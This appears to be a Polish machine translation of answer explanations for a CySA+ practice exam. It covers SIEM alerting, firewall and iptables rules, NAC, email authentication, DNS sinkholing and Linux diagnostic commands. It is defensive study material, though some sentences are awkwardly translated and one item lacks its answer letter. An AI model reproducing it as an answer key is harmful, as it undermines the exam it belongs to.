5. C. Kanały informacji o zagrożeniach mogą być używane do tworzenia reguł, jednak w przeciwieństwie do opcji B, źródła zagrożeń zazwyczaj nie są używane do tworzenia reguł w czasie rzeczywistym dla urządzeń zapory. Zapory zwykle nie analizują własnych logów i nie tworzą wpisów w kanałach STIX, ani nie wiedzą o zagrożeniu ,nazwiska aktorów, zasoby i poziomy zagrożeń.
6. B. PowerShell, wmic i winrm.vbs są powszechnie używane do zdalnego wykonywania kodu lub skryptów, a znalezienie ich w użyciu na typowej stacji roboczej powinno być powodem do niepokoju, ponieważ większość użytkowników nigdy nie użyje żadnego z tych trzech.
7. A. Najpopularniejszy ruch HTTP będzie kierowany do portu 80, a ruch HTTPS do portu 443. Trzecim najpopularniejszym portem dla ruchu sieciowego jest port 8080 i byłby to rozsądny, choć znacznie mniej powszechna opcja. Chociaż inne porty mogą być używane, jeśli nie spodziewasz się ruchu na niestandardowych portach HTTP i HTTPS, możesz go zbadać.
8. C. Analiza dostępności ma na celu sprawdzenie, czy system lub usługa działa zgodnie z oczekiwaniami. Chociaż SIEM może nie mieć możliwości bezpośredniej analizy dostępności, raportowanie, gdy dzienniki lub inne dane nie są odbierane z systemów źródłowych, może pomóc w wykrywaniu przestojów. Idealnie, organizacja Lucy powinna używać narzędzia do monitorowania systemu, które może alarmować o problemach z dostępnością, a także o typowych problemach systemowych, takich jak nadmierne zużycie pamięci, sieci, dysku lub procesora.
9. C. W obliczu ogromnej liczby powiadomień, które są wysyłane zbyt agresywnie, administratorzy prawdopodobnie zignorują lub przefiltrują alerty. Gdy to zrobią, prawdopodobnie nie zareagują na rzeczywiste problemy, co spowoduje utratę wszystkich zalet monitorowania. Jeśli nie poświęci trochę czasu na określenie rozsądnych progów i częstotliwości powiadomień, następna rozmowa Lucy prawdopodobnie odbędzie się z rozzłoszczonym administratorem lub menedżerem systemu.
10. D. Lucy skonfigurowała wykrywanie oparte na zachowaniu. Prawdopodobne jest, że rozsądny procent wykrytych przypadków będzie uzasadnionym wyjazdem użytkowników, którzy zazwyczaj nie opuszczają kraju, ale połączenie tego wykrywania behawioralnego z innymi wykryciami behawioralnymi lub anomaliami może pomóc w ustaleniu, czy logowanie jest uzasadnione, czy nie.
11. D. Wyłączenie niepotrzebnych lub ryzykownych usług jest przykładem strategii mającej na celu zmniejszenie powierzchni ataku systemu lub urządzenia. Modelowanie zagrożeń i proaktywna ocena ryzyka to działania, które koncentrują się na przygotowaniu, a nie na bezpośrednim działaniu systemów lub technologii, a naprawa incydentów może obejmować wyłączenie usługi, ale nie ma wystarczających informacji, aby wiedzieć o tym na pewno. Wiemy na pewno, że wyłączenie niepotrzebnych usług zmniejsza obszar powierzchni ataku dla systemu.
12. C. RDP działa na TCP 3389. Większość korporacyjnych stacji roboczych nie będzie mieć włączonego protokołu RDP dla ruchu przychodzącego do stacji roboczych, a Suki może odkryć, że wykryła kompromis lub inne zachowanie, którego jej organizacja może nie chcieć.
13. B. Windows obsługuje zarówno DEP (zapobieganie wykonywaniu danych), jak i ASLR (randomizacja lokalizacji przestrzeni adresowej). Łączą się one, aby zapobiec przepełnieniu bufora, zapobiegając wykonywaniu elementów w lokalizacji pamięci oznaczonych jako dane i losując przestrzeń pamięci używaną przez system Windows, aby utrudnić wykorzystanie znanych lokalizacji pamięci z przepełnieniem.
14. A. Isaac powinien zalecać 802.1x, standard kontroli dostępu do sieci w oparciu o porty. Zarówno DMARC, jak i SPF to standardy bezpieczeństwa poczty e-mail, a 802.3 to specyfikacja dla Ethernetu, ale nie jest to standard bezpieczeństwa.
15. C. Plik auth.log w systemach Linux przechwyci zdarzenia sudo. Doświadczony napastnik prawdopodobnie usunie lub zmodyfikuje plik auth.log, więc Ian powinien upewnić się, że system wysyła te zdarzenia przez syslog do zaufanego, bezpiecznego hosta. Plik sudoers zawiera szczegółowe informacje o tym, którzy użytkownicy mogą korzystać z sudo i jakie mają prawa. Nie ma pliku o nazwie /var/log/sudo , a plik .bash_log root′a może zawierać polecenia, które root uruchomił, ale nie będzie zawierał szczegółów zdarzenia sudo - nie ma powodu, aby root przeniósł sudo do roota!
16. Organizacja C. Pete'a korzysta z opartego na agencie rozwiązania NAC poza pasmem, które opiera się na lokalnie zainstalowanym agencie w celu komunikowania się z istniejącymi urządzeniami infrastruktury sieciowej o stanie bezpieczeństwa jego systemu. Gdyby organizacja Pete'a korzystała z dedykowanych urządzeń, byłoby to rozwiązanie typu in-band, a brak zainstalowanego agenta spowodowałby, że byłaby bezagentowa.
17. B. Tripwire może monitorować pliki i katalogi pod kątem zmian, co oznacza, że Gabby może go używać do monitorowania plików w katalogu, który uległ zmianie. Nie poinformuje Cię, jak często uzyskuje się dostęp do katalogu, kto przeglądał pliki ani czy poufne dane zostały skopiowane z katalogu.
18. C. Nawet jeśli nie znasz narzędzi PS, możesz wykorzystać swoją wiedzę na temat narzędzi wiersza poleceń systemu Windows, aby dowiedzieć się, co się tutaj dzieje. Widzimy zdalną stację roboczą (jest wysoce nieprawdopodobne, abyś w ten sposób łączył się ze swoją własną stacją roboczą!) wskazaną przez \\ip.address , flagę -u prawdopodobnie oznaczającą identyfikator użytkownika z podanym administratorem i -p jako hasło. Wiemy, że cmd.exe jest wierszem poleceń systemu Windows, więc rozsądne i prawidłowe jest założenie, że spowoduje to otwarcie zdalnego wiersza poleceń do użytku interaktywnego. Jeśli jest to użytkownik, który nie jest administratorem, Charlene musi natychmiast rozpocząć dochodzenie w sprawie incydentu.
19. Port TCP 3306 jest powszechnym portem usług dla MySQL. Jeśli zostaniesz poproszony o przejrzenie reguł dla IPS, IDS, zapory lub innej usługi i nie znasz składni reguły, poszukaj tego, co wiesz. Tutaj możesz określić kierunek -> i czy alert będzie szukał ruchu z dowolnego systemu na dowolnym porcie do systemów w zakresie sieci 10.10.11.0/24 na porcie 3306.
20. B. Analityka zachowań użytkowników i zdarzeń lub podmiotów (UEBA) przechwytuje dane o podmiotach i zdarzeniach, a także inne dane dotyczące bezpieczeństwa oraz przeprowadza analizy statystyczne i inne w celu wykrycia nieprawidłowości i nieoczekiwanych zachowań, a następnie ostrzega administratorów, aby mogli przejrzeć informacje i podjąć odpowiednie działania.
21. B. Sadiq powinien umieścić swój IPS w punkcie B. Zapora odfiltruje duże ilości niepotrzebnego ruchu, zmniejszając obciążenie IPS, a IPS zobaczy największą ilość niezaufanego ruchu w tej lokalizacji bez rozrównywania z zwiększone obciążenie, które napotka poza zaporą.
22. C. SYN zalewa technikę ataku, która służy do wyczerpywania programów obsługi sesji w systemach. Zalew SYN z wielu różnych adresów IP bez zakończonego trójetapowego uzgadniania TCP jest często oznaką ataku typu SYN flood.
23. B. Najpierw Kai powinien sprawdzić dziennik skanowania, aby przejrzeć typ skanowania i kod błędu, aby to sprawdzić za pośrednictwem witryny pomocy technicznej Microsoft. Najbardziej prawdopodobną przyczyną z listy udzielonych odpowiedzi jest konflikt z innym produktem zabezpieczającym. Podczas gdy specjaliści od bezpieczeństwa często martwią się złośliwym oprogramowaniem w systemach, częstą przyczyną niepowodzeń skanowania jest drugi zainstalowany pakiet antywirusowy. Jeśli Kai nie znajdzie zainstalowanego drugiego pakietu antywirusowego, powinna przeprowadzić skanowanie za pomocą innego narzędzia, aby sprawdzić, czy przyczyną problemu może być złośliwe oprogramowanie.
24. C. Umieszczanie na czarnej liście znanych złych adresów IP, a także korzystanie z usług reputacji domeny i adresów IP może pomóc Charlesowi w wykonaniu swojego zadania. Biała lista przepuszcza tylko znane adresy i nie oznacza znanych złych adresów.
25. B. Narzędzie ps wyświetla aktualnie uruchomione procesy, a aux to zestaw flag kontrolujących, które procesy są wybrane. To wyjście jest następnie przesyłane do grep , a wszystkie wiersze z tekstem apache2 zostaną zaznaczone. Następnie ta lista zostanie przeszukana pod kątem korzenia tekstu. Ten rodzaj wielu potoków może pomóc w szybkim przetwarzaniu dużych ilości plików i tysięcy lub milionów wierszy tekstu.
26. C. Najbardziej prawdopodobnym scenariuszem w tej sytuacji jest to, że nagłówki zostały sfałszowane, aby wiadomość e-mail wyglądała na pochodzącą z example.com , ale w rzeczywistości wiadomość e-mail została wysłana z mail.demo.com
27. A. Bezpieczeństwo portu opiera się na adresach MAC w celu filtrowania, które systemy mogą łączyć się z portem, co oznacza, że Corbin musi rozważyć, jak zapobiec fałszowaniu adresów MAC.
28. D. Chociaż SPF i DKIM mogą pomóc, połączenie ich w celu ograniczenia zaufanych nadawców tylko do znanej listy i udowodnienie, że domena jest domeną wysyłającą wiadomość e-mail, łączy się w formie DMARC, aby zapobiec podszywaniu się pod e-mail, gdy inne organizacje również DMARC .
29. D. Nagłówki wiadomości e-mail zawierają identyfikator wiadomości, datę, do, od, agenta użytkownika, adresy IP nadawcy i odbiorcy oraz informacje o serwerach poczty e-mail na ścieżce między nimi. Nie zawierają klucza prywatnego.
30. A. Jedynym błędem w tej regule jest protokół. SMTP działa na porcie 25, a połączenia przychodzące powinny być akceptowane z dowolnego portu i adresu IP. Docelowy adres IP (10.15.1.1) jest poprawny. Jednak SMTP używa protokołu transportowego TCP, a nie UDP.
31. B. Chris może naprawić ten błąd, zmieniając pozycje reguł 2 i 3. Reguła 3, która zezwala na dostęp z podsieci 10.20.0.0/16, nigdy nie zostanie uruchomiona, ponieważ każdy ruch z tej podsieci również pasuje do reguły 2, która blokuje to.
32. D. Reguła 4 jest poprawnie zaprojektowana, aby umożliwić dostęp SSH z sieci zewnętrznych do serwera zlokalizowanego pod adresem 10.15.1.3. Błąd nie dotyczy bazy reguł zapory i Chris powinien poszukać innych przyczyn.
33. B. Przejście do środowiska NAT sprawi, że systemy będą niedostępne ze świata zewnętrznego, znacznie zmniejszając powierzchnię ataku organizacji. Instalacja zapór hosta byłaby świetnym drugim krokiem, ale może wymagać znacznego nakładu pracy przy instalacji i dostrajaniu zapór.
34. C. Struktura ATT&CK definiuje wektor ataku jako specyfikę tego, w jaki sposób przeciwnik zaatakowałby cel. Nie musisz zapamiętywać ATT&CK, aby zdać egzamin, ale powinieneś być przygotowany na napotkanie pytań, które musisz zawęzić na podstawie posiadanej wiedzy. W tym miejscu możesz wykluczyć gracza stanowiącego zagrożenie i metodę kierowania, a następnie zdecydować między wektorem ataku a słabością organizacji.
35. B. Zarówno sieci kwarantanny, jak i portale przechwytujące z narzędziami do łatania i instrukcjami są powszechnymi rozwiązaniami tego typu wymagań. W takim przypadku umieszczenie systemów w odizolowanej sieci kwarantanny z dostępem do witryn aktualizacji i poprawek zaspokoi potrzeby Manisha.
36. A. Ataki phishingowe zazwyczaj mają na celu poświadczenia, więc Lisa powinna skoncentrować się na tym, jak zidentyfikować ujawnione dane uwierzytelniające, jak zapobiec powodowaniu problemów przez skompromitowane dane uwierzytelniające oraz jak zmniejszyć prawdopodobieństwo przyszłych udanych ataków phishingowych. Jednocześnie będzie musiała monitorować wykorzystanie zhakowanych danych uwierzytelniających!
37. C. Przejęcie sesji niezabezpieczonych plików cookie sesji jest prawdopodobnym skutkiem tego typu problemu. Matt powinien spędzać czas ze swoimi programistami, aby upewnić się, że przejrzeli zasoby, takie jak przewodniki OWASP, aby zabezpieczyć tworzenie i konserwację sesji.
38. B. Ataki typu brute-force polegają na możliwości podejmowania wielokrotnych prób logowania, dostępu do usługi lub w inny sposób zezwalania na sondy. Algorytm wycofywania może to ograniczyć lub zapobiec, zapewniając, że możliwa jest tylko ograniczona liczba prób przed wystąpieniem opóźnień lub blokady czasowej.
39. A. Język Structured Threat Information Expression (STIX) oraz TAXII, protokół używany do przesyłania informacji o zagrożeniach, to otwarte protokoły, które zostały przyjęte, aby umożliwić skuteczne łączenie wielu źródeł zagrożeń. SAML to Security Assertion Markup Language, OCSP to Online Certificate Status Protocol, a CAB został wymyślony na to pytanie.
40. B. Rzeczą, którą chce zrobić aktor zagrożenia, jest cel w taksonomii STIX 2.0. Ponieważ jest mało prawdopodobne, żebyś zapamiętał taksonomię, kiedy napotkasz takie pytanie, powinieneś wykluczyć, co możesz. Większość pytań będzie miała jedną lub więcej oczywiście błędnych odpowiedzi - tutaj jest to prawdopodobnie ich poziom zasobów i ich alias. Gdybyś tylko wykluczył te dwa, miałbyś 50 procent szans, że odpowiesz na takie pytanie. W takim przypadku można prawdopodobnie zgadnąć, że chęć kradzieży danych z badań jądrowych jest celem i przejść do następnego pytania.
41. C. Ramy ATT&CK koncentrują się na obronie sieci i szeroko obejmują polowanie na zagrożenia. CAPEC koncentruje się na bezpieczeństwie aplikacji. CVSS to Common Vulnerability Scoring System, a Mopar to organizacja zajmująca się częściami, serwisem i obsługą klienta, która jest częścią Fiata Chryslera.
42. C. NAC (Network Access Control) może łączyć uwierzytelnianie użytkownika lub systemu z konfiguracją opartą na kliencie lub bez klienta oraz możliwościami profilowania, aby zapewnić, że systemy są odpowiednio załatane, skonfigurowane i znajdują się w pożądanym stanie bezpieczeństwa. Biała lista służy do umożliwienia pracy określonych systemów lub aplikacji, zabezpieczenia portów to funkcja filtrowania adresów MAC, a Extensible Authentication Protocol (EAP) to protokół uwierzytelniania.
43. D. Bazy danych Oracle domyślnie korzystają z portu TCP 1521. Ruch z systemu "zewnętrznego" jest odrzucany, gdy próbuje uzyskać dostęp do systemu wewnętrznego przez ten port.
44. C. Pakowacze lub pakery środowiska uruchomieniowego to narzędzia, które samorozpakowują się po uruchomieniu, co utrudnia odtworzenie kodu. Szyfrujący mogą używać rzeczywistego szyfrowania lub po prostu zaciemniać kod, utrudniając jego interpretację lub odczyt. Ochraniacze to oprogramowanie, które ma zapobiegać inżynierii wstecznej i często obejmują techniki pakowania i szyfrowania, a także inne technologie ochronne. Tasowanie zostało wymyślone na to pytanie.
45. B. Testowanie pod kątem typowych plików przykładowych i domyślnych jest powszechną taktyką skanerów luk w zabezpieczeniach. Nara może rozsądnie przypuszczać, że jej serwer WWW Apache został przeskanowany przy użyciu skanera luk w zabezpieczeniach.
46. A. Ponieważ Andrea próbuje powstrzymać zewnętrzne skanowanie przed gromadzeniem informacji o jej topologii sieci, najlepszym miejscem do ich powstrzymania jest zapora. Dobrze zaprojektowany zestaw reguł może zatrzymać lub przynajmniej ograniczyć ilość informacji o topologii sieci, które mogą zebrać osoby atakujące.
47. D. Reguła Snort. Adama szuka określonego zachowania - w tym przypadku ruchu sieciowego do skryptu pobierania example.com. Reguły poszukujące anomalii zazwyczaj wymagają zrozumienia "normalności", podczas gdy reguły oparte na trendach muszą śledzić działania w czasie, a analiza oparta na dostępności monitoruje czas pracy bez przestojów.
48. C. Ponieważ LOIC może wykorzystywać setki lub tysiące hostów, ograniczenie każdego łączącego się hosta do szybkości połączenia i głośności przez filtry, takie jak te dostarczane przez wtyczkę hashlimit iptables, może pomóc. Czarna lista oparta na adresach IP może działać w przypadku mniejszych botnetów, ale jest trudna do utrzymania w przypadku większych ataków i może ostatecznie zablokować legalny ruch. Odrzucenie wszystkich pakietów SYN uniemożliwiłoby wszystkie połączenia TCP, a filtry blokujące trasy nie są metodą stosowaną do zapobiegania tego typu atakom. Podczas konfigurowania reguł zapory Carlos może również chcieć zbadać partnera lub usługę łagodzącą odmowę usługi na wypadek, gdyby atakujący przeszli do bardziej zaawansowanych metod lub przeciążyli jego łącze.
49. D. Chociaż infekcja nie może spowodować utraty danych przez firmę, efekt jest taki, że systemy muszą zostać przywrócone i konieczne będzie przeprowadzenie dochodzenia w celu ustalenia, czy dane zostały utracone poza zaszyfrowaniem na miejscu.
50. D. Zastosowania opisane dla stacji roboczej zabezpieczanej przez firmę Cormac nie wymagają dostępu przychodzącego do systemu na żadnym z tych portów. Przeglądanie stron internetowych i domena Active Directory .Ruch związany z członkostwem może być obsługiwany przez ruch inicjowany przez system.
51. A. W przypadku większości stacji roboczych użytkowników systemu Windows uruchamianie cmd.exe przez programy inne niż Eksplorator nie jest typowe. Ten skrypt zidentyfikuje te uruchomienia i zaalarmuje je.
52. C. Cormac zbudował rozsądną początkową listę wersji systemu operacyjnego, ale wiele urządzeń w nowoczesnej sieci nie będzie pasować do tej listy, co powoduje problemy z niezgodnością wersji systemu operacyjnego z regułami dopasowania, które zbudował. Może potrzebować albo dodać szersze listy akceptowanych systemów operacyjnych, albo jego organizacja może potrzebować uaktualnienia lub wymiany urządzeń, których nie można uaktualnić do akceptowalnych wersji.
53. B. Implementacja Henry′ego jest formą drenażu DNS, który wysyła ruch na alternatywny adres, który działa jako lej dla ruchu, który w przeciwnym razie trafiłby do znanej złej domeny.
54. C. Maria może przesłać zaktualizowany plik hosts do swoich systemów podłączonych do domeny, które skierują ruch przeznaczony dla znanych złych domen do hosta lokalnego lub bezpiecznego systemu. Może chcieć współpracować z analitykiem bezpieczeństwa lub innym pracownikiem IT w celu przechwytywania zapytań wysyłanych do tego systemu w celu śledzenia potencjalnie zainfekowanych stacji roboczych. Dziura DNS działałaby tylko wtedy, gdyby wszystkie systemy korzystały z lokalnego DNS, a użytkownicy spoza lokalizacji prawdopodobnie mają ustawione ustawienia DNS przez sieci lokalne, z którymi się łączą. Aplikacje antymalware mogą nie mieć jeszcze aktualizacji lub mogą nie wykryć złośliwego oprogramowania, a wymuszanie aktualizacji BGP dla sieci innych firm jest prawdopodobnie złym pomysłem.
55. B. Nazwy domen, takie jak wymienione, są powszechnym znakiem algorytmu generowania domen (DGA), który tworzy proceduralnie generowane nazwy domen dla hostów dowodzenia i kontroli złośliwego oprogramowania.
56. B. Pierwsze zapytanie zidentyfikuje czasy uruchomienia reg.exe przez cmd.exe . Jeśli te same dane zostaną przeszukane w celu skorelowania z uruchomieniami cmd.exe przez explorer.exe , Mark będzie wiedział, kiedy edycje rejestru zostały uruchomione za pomocą wiersza poleceń ( cmd.exe ) z Eksploratora - jest to proces, który zwykle oznacza, że użytkownicy dokonali edycji rejestru, co powinno być rzadkim wydarzeniem w większości organizacji i może stanowić zagrożenie dla bezpieczeństwa.
57. C. Gdy istnieje luka w zabezpieczeniach, a łata nie została wydana lub nie można jej zainstalować, mechanizmy kompensacyjne mogą zapewnić odpowiednią ochronę. W przypadku PCI DSS (i innych standardów zgodności) udokumentowanie, jakie kontrole kompensacyjne zostały wprowadzone, i udostępnienie tej dokumentacji jest ważnym krokiem w kierunku zgodności.
58. D. Jedyny pewny zakład Mateo, aby uniemożliwić dostęp do tych usług, to umieszczenie przed nimi zapory sieciowej. Wiele urządzeń domyślnie włącza usługi, ponieważ są to urządzenia, dla których mogą nie być dostępne zapory hosta. Często też nie mają dostępnych poprawek, a wiele urządzeń nie pozwala na wyłączenie lub modyfikację świadczonych przez nich usług.
59. B. To polecenie używa flagi -i, co oznacza, że zignoruje wielkość liter w tekście. Oznacza to, że grep przeszuka wszystkie pliki z rozszerzeniem .txt pod kątem wystąpienia example , niezależnie od wielkości liter lub innych liter wokół niego.
60. C. System zapobiegania utracie danych (DLP) może przechwytywać i blokować niezaszyfrowane poufne informacje opuszczające serwer sieciowy, ale nie stosuje kryptografii do komunikacji sieciowej. Transport Layer Security (TLS) to najbardziej bezpośrednie podejście do spełnienia wymagań Pranab, ponieważ szyfruje całą komunikację do iz serwera WWW. Wirtualne sieci prywatne (VPN) mogą być również używane do szyfrowania ruchu sieciowego, dodając warstwę bezpieczeństwa. Szyfrowanie całego dysku (FDE) może również służyć do ochrony informacji przechowywanych na serwerze w przypadku kradzieży dysku.
61. A. Polecenie top zapewnia widok w czasie rzeczywistym wykorzystania pamięci przez system na podstawie procesu. Polecenie ls nie działa dla pamięci; mem został wymyślony na to pytanie; a memstat służy do sprawdzania stanu serwerów memcached i nie pomoże w tej sytuacji. Jeśli nie znasz podstawowych poleceń systemu Linux, takich jak top , powinieneś spędzić trochę czasu z systemem Linux, przygotowując się do egzaminu CySA+. Podstawowa znajomość typowych poleceń może być bardzo pomocna.
62. A. Rejestrowanie aktywności aplikacji i serwerów może dostarczyć cennych dowodów podczas dochodzenia kryminalistycznego. Pozostałe trzy wymienione kontrole to proaktywne kontrole zaprojektowane w celu zmniejszenia ryzyka wystąpienia incydentu i są mniej prawdopodobne, że bezpośrednio dostarczają informacji podczas dochodzenia kryminalistycznego.
63. C. Kluczowym wymogiem jest tutaj to, że jest to istniejąca sieć i że systemy są objęte trendami BYOD. Oznacza to, że Latisha powinna skoncentrować się na systemie bezagentowym, aby usunąć przeszkody wymagane przez skanowanie oparte na agentach, a rozwiązanie pozapasmowe jest prawdopodobnie odpowiednie, ponieważ łatwiej je doposażyć w istniejącą sieć niż rozwiązanie in-line, które może wymagać zmiany architektury sieci w celu umieszczenia wbudowanego urządzenia NAC w centralnym miejscu sterowania. Należy zauważyć, że Latisha prawdopodobnie będzie miała mniejszą widoczność niż w przypadku systemu opartego na agentach.
64. A. Obiekty zasad grupy (GPO) są używane do egzekwowania wymagań bezpieczeństwa i konfiguracji w Active Directory. Lasy i jednostki organizacyjne (OU) usługi Active Directory są zaprojektowane do hierarchicznej organizacji systemów i użytkowników i nie zezwalają bezpośrednio na konfiguracje zabezpieczeń, chociaż można do nich zastosować obiekty zasad grupy. Kontrolery domeny (DC) to serwery, które są odpowiedzialne za świadczenie usług domenowych w usłudze Active Directory dla organizacji i stanowią punkt do zastosowania i wymuszenia obiektu zasad grupy.
65. A. Bezpieczne/wielofunkcyjne rozszerzenia poczty internetowej (S/MIME) to standard szyfrowania i podpisywania, który został zaimplementowany na wielu platformach poczty e-mail. Jeśli zarówno jego klient poczty e-mail, jak i klient poczty odbiorcy obsługują tę funkcję, Eric może podpisać cyfrowo swoją wiadomość e-mail, aby udowodnić, że ją wysłał i że treść nie została zmieniona.
66. B. Te polecenia dodadzą filtry do zestawu reguł INPUT, które blokują ruch z hostów A i B, jednocześnie zezwalając tylko na port 25 z hosta C. Opcja D może wydawać się atrakcyjna, ale zezwala na cały ruch zamiast tylko SMTP. Opcja A odrzuca tylko ruch SMTP z hosta B (i wszystkich innych hostów w jego segmencie /24), podczas gdy opcja C zezwala na ruch z hostów, które chcemy zablokować.
67. A. Dodanie wpisu iptables wykorzystuje flagę -A do dodania do listy. Tutaj możemy bezpiecznie założyć, że OUTPUT jest zestawem reguł wychodzących. Flaga -d służy do określenia adresu IP lub zakresu podsieci, a -j określa akcję D ROP .
68. D. Ten widok htop pokazuje, że zarówno CPU1, jak i CPU2 są maksymalnie na 100%. Pamięć jest wykorzystywana w nieco ponad 60 procentach. Dostępna jest prawie cała przestrzeń wymiany.
69. B. Polecenie top wyświetli dynamiczną listę uruchomionych procesów w czasie rzeczywistym. Jeśli Amanda uruchomi to, natychmiast zobaczy, że dwa procesy zużywają 99 procent procesora i zobaczy polecenie, które uruchomiło program.
70. D. Komenda kill służy do kończenia procesów w systemie Linux. Amanda powinna wydać polecenie kill -9, a następnie identyfikator procesu, który chce zakończyć (flaga -9 jest sygnałem i oznacza "naprawdę bardzo się staraj, aby zabić ten proces"). Ponieważ uruchamiała zarówno top, jak i htop , wie, że musi zakończyć procesy 3843 i 3820, aby stres nie zużywał wszystkich jej zasobów. Niewiele badań później pokaże jej, że stres jest aplikacją do testowania stresu, więc może chcieć zapytać użytkownika, który ją uruchomił, dlaczego jej używał, jeśli nie było to częścią ich pracy.
71. A. Podszywanie się pod adres MAC lub klonowanie umożliwi systemowi łatwe ominięcie zabezpieczeń portu, ponieważ zabezpieczenia portów opierają się tylko na weryfikacji adresu MAC w celu podjęcia decyzji, które systemy mogą łączyć się z danym portem sieciowym.
72. B. Domyślnie firewall iptables będzie miał łańcuchy INPUT, OUTPUT i FORWARD. Piper powinien użyć polecenia DROP na wszystkich trzech, aby zatrzymać cały ruch do lub z maszyny.
73. B. Syd dodała wpis do pliku hosts, który kieruje cały ruch z example.com na jej adres lokalny. Jest to przydatna technika uniemożliwiająca systemowi kontaktowanie się ze złośliwym hostem lub domeną lub po prostu uniemożliwiająca nietechnicznemu użytkownikowi odwiedzanie określonych witryn lub domen.
74. B. John odkrył program, który zarówno akceptuje połączenia, jak i ma otwarte połączenie, z których żadne nie jest typowe dla gry Saper. Atakujący często maskują trojany jako nieszkodliwe aplikacje, więc Jan powinien postępować zgodnie z planem reagowania na incydenty swojej organizacji.
75. C. Narzędzia do wykrywania i reagowania na punkty końcowe (EDR) używają agentów oprogramowania do monitorowania systemów punktów końcowych i zbierania danych o procesach, aktywności użytkowników i systemów oraz ruchu w sieci, które są następnie przesyłane do centralnego systemu przetwarzania, analizy i przechowywania.
76. C. To polecenie zapobiega rejestrowaniu poleceń wprowadzonych w wierszu poleceń powłoki Bash, ponieważ wszystkie są wysyłane do /dev/null . Ten typ działania jest jednym z powodów, dla których konta administracyjne są często rejestrowane na zdalnych hostach, uniemożliwiając złośliwym osobom lub atakującym, którzy uzyskują dostęp administracyjny, ukrycie swoich śladów.
77. D. Po przekazaniu wiadomości e-mail zostanie utworzona nowa wiadomość z nowym nagłówkiem Message-ID. Pola w odpowiedzi do i referencje również zostaną ustawione jako normalne. Najlepszą opcją, jaką ma Charles, jest szukanie wskazówek, takich jak wiersz tematu, który brzmi "FWD" - coś, co można łatwo zmienić.
78. D. Binarny passwd wyróżnia się jako niedawno zmieniony. Może to być nieszkodliwe, ale jeśli Marta uważa, że komputer został skompromitowany, istnieje duża szansa, że plik binarny passwd został zastąpiony złośliwą wersją. Powinna sprawdzić plik binarny pod kątem znanej dobrej wersji, a następnie postępować zgodnie z procesem reagowania na incydent, jeśli nie pasuje.
79. B. Zaplanowane zadania, tworzenie usług i klucze rejestru autostartu są powszechnie spotykane w systemach Windows w uzasadnionych celach. Wymiana usług jest znacznie mniej powszechna, chyba że pojawiła się znana aktualizacja lub poprawka.
80. B. Nawet jeśli nie rozpoznajesz identyfikatora zdarzenia Windows, to zapytanie dostarcza wielu przydatnych wskazówek. Po pierwsze, ma interwał czterech godzin, więc znasz ramy czasowe. Następnie wyświetla data.login.user , co oznacza, że prawdopodobnie pytasz o loginy użytkowników. Wreszcie zawiera liczbę komputerów i >1, dzięki czemu można określić, że szuka więcej niż jednego systemu, do którego zalogowano się. Podsumowując, oznacza to, że zapytanie wyszukuje użytkowników, którzy zalogowali się na więcej niż jednym komputerze w danym okresie czterech godzin. Matt może chcieć dostroić to do krótszego okresu, ponieważ fałszywe alarmy mogą skutkować dla personelu pomocy technicznej, ale ponieważ większość użytkowników nie loguje się na więcej niż jednym komputerze, może to być bardzo przydatne zapytanie do wykrywania zagrożeń.
81. D. Polecenie strings wyodrębnia z plików ciągi znaków drukowalnych, pozwalając Benowi szybko określić zawartość plików. Grep wymagałby wiedzy, czego szuka, a zarówno mniej, jak i mniej po prostu wyświetli plik, co często nie jest użyteczną strategią w przypadku plików binarnych.
82. D. Dziury DNS mogą blokować wiele typów drive-by downloads, uniemożliwiając systemom łączenie się ze złośliwymi witrynami. Dziury DNS mają ograniczenia: działają tylko wtedy, gdy pojawia się zapytanie DNS, co oznacza, że niektóre złośliwe oprogramowanie wykorzystuje adresy IP bezpośrednio, aby ich uniknąć. Nie są również w stanie powstrzymać uruchomienia złośliwego oprogramowania i oczywiście złośliwe oprogramowanie może korzystać z zakodowanego na stałe serwera DNS zamiast serwera DNS organizacji.
83. D. Usługa uruchomiona z katalogu www jako użytkownik apache powinna być natychmiastową wskazówką czegoś dziwnego, a użycie webmina z tego katalogu powinno być silnym wskaźnikiem czegoś nie tak. Lucas powinien skoncentrować się na serwerze WWW jako punkcie wejścia do systemu i powinien przejrzeć wszelkie pliki utworzone lub zmodyfikowane przez użytkownika Apache. Jeśli lokalne luki w zabezpieczeniach istniały w momencie wystąpienia tego włamania, osoba atakująca mogła już przejść na inne konto.
84. A. SCAP (Security Content Automation Protocol) to zestaw specyfikacji definiujących sposób wymiany treści automatyzacji zabezpieczeń używanych do oceny zgodności konfiguracji. Może być również używany do wykrywania podatnych na ataki wersji oprogramowania.
85. C. Damian prawdopodobnie napotkał zaawansowane trwałe zagrożenie (APT). Charakteryzują się one wyjątkowo dobrze wyposażonymi aktorami, których kompromisy zazwyczaj mają dłuższy czas przebywania i zdolność do skalowania zdolności w celu przeciwdziałania obrońcom w miarę upływu czasu.
86. D. Systemy Linux i Unix zazwyczaj przechowują informacje o kontach użytkowników w /etc/passwd , a /etc/shadow zawiera informacje o hasłach i wygaśnięciu konta. Użycie diff między dwoma plikami nie jest użyteczną strategią w tym scenariuszu.
87. C. Rosnąca cyfra adresu IP systemu docelowego (.6, .7, .8) oraz żądanie echa protokołu ICMP wskazują, że jest to przemiatanie ping. Może to być częścią skanowania portu, ale jedynym pokazanym tutaj zachowaniem jest przemiatanie ping. Jest to ICMP i nie może być trójstronnym uzgadnianiem, a traceroute podążałby ścieżką, a nie serią adresów IP.
88. C. Integracje oparte na API umożliwiają środowisku SOAR wysyłanie zapytań zgodnie z wymaganiami dla potrzebnych danych. Płaskie pliki i pliki CSV mogą być przydatne, gdy nie ma interfejsu API lub gdy nie ma obsługi interfejsu API w środowisku, a integracja w czasie rzeczywistym nie jest wymagana. Integracja poczty e-mail może powodować opóźnienia, ponieważ dostarczanie wiadomości e-mail nie odbywa się z gwarantowaną szybkością i może wymagać dodatkowego analizowania i przetwarzania w celu wyodrębnienia informacji. Chociaż nie ma go na tej liście, Bruce może rozważyć bezpośrednie połączenie z bazą danych, jeśli nie będzie w stanie korzystać z interfejsu API i chciał uzyskać dane w czasie rzeczywistym.
89. D. Chociaż egzamin CySA+ zawiera podpisy wiadomości e-mail na liście elementów, które możesz chcieć przeanalizować, te same techniki są używane do analizy całej treści wiadomości e-mail pod kątem złośliwych linków i ładunków. Dane nagłówkowe są często sprawdzane w bazach danych reputacji adresów IP i innych testach, które mogą pomóc ograniczyć pocztę e-mail z domen spamowych i znanych złośliwych nadawców. Jednak bloki sygnatur nie są zazwyczaj podstawowym narzędziem analizy.
